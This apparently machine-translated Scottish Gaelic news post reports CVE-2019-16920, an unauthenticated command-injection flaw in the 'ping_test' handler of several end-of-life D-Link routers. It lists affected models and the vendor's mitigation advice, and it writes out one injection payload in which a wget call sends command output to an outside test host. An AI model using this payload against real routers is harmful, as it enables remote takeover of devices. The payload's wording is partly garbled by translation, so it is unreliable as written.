ProHoster > Blog > naidheachdan eadar-lìn > So-leòntachd a ghabhas cleachdadh air astar ann an routers D-Link

So-leòntachd a ghabhas cleachdadh air astar ann an routers D-Link

Ann an routers gun uèir D-Link aithnichte so-leòntachd cunnartach (CVE-2019 – 16920), a leigeas leat còd a chuir an gnìomh air astar air taobh an uidheim le bhith a’ cur iarrtas sònraichte chun neach-làimhseachaidh “ping_test”, ruigsinneach gun dearbhadh.

Gu inntinneach, a rèir luchd-leasachaidh firmware, cha bu chòir an gairm “ping_test” a chuir gu bàs a-mhàin às deidh dearbhadh, ach ann an da-rìribh tha e air a ghairm co-dhiù, ge bith dè an logadh a-steach don eadar-aghaidh lìn. Gu sònraichte, nuair a gheibh thu cothrom air an sgriobt app_sec.cgi agus a’ dol seachad air a’ pharameter “action = ping_test”, bidh an sgriobt ag ath-stiùireadh chun duilleag dearbhaidh, ach aig an aon àm a’ coileanadh a’ ghnìomh co-cheangailte ri ping_test. Gus an còd a chuir an gnìomh, chaidh so-leòntachd eile a chleachdadh ann am ping_test fhèin, a tha a’ gairm an goireas ping gun a bhith a’ dèanamh sgrùdadh ceart air ceartachd an t-seòlaidh IP a chaidh a chuir airson deuchainn. Mar eisimpleir, gus an goireas wget a ghairm agus toraidhean an àithne “echo 1234” a ghluasad gu òstair a-muigh, dìreach sònraich am paramadair “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$ (mac-talla 1234)".

So-leòntachd a ghabhas cleachdadh air astar ann an routers D-Link

Tha làthaireachd an so-leòntachd air a dhearbhadh gu h-oifigeil anns na modalan a leanas:

  • DIR-655 le firmware 3.02b05 no nas sine;
  • DIR-866L le firmware 1.03b04 no nas sine;
  • DIR-1565 le firmware 1.01 no nas sine;
  • DIR-652 (chan eil fiosrachadh sam bith mu dhreach firmware trioblaideach air a thoirt seachad)

Tha an ùine taic airson na modailean sin air tighinn gu crìch mu thràth, mar sin D-Link ag ràdh, nach leig a-mach ùrachaidhean dhaibh gus cuir às don so-leòntachd, nach eil a’ moladh an cleachdadh agus a ’comhairleachadh innealan ùra a chuir nan àite. Mar fhuasgladh tèarainteachd, faodaidh tu ruigsinneachd air an eadar-aghaidh lìn a chuingealachadh gu seòlaidhean IP earbsach a-mhàin.

Chaidh a lorg nas fhaide air adhart gu robh an so-leòntachd cuideachd buaidh modailean DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 agus DIR-825, planaichean airson ùrachaidhean a leigeil ma sgaoil air nach eil fios fhathast.

Source: fosgailtenet.ru

Cuir beachd ann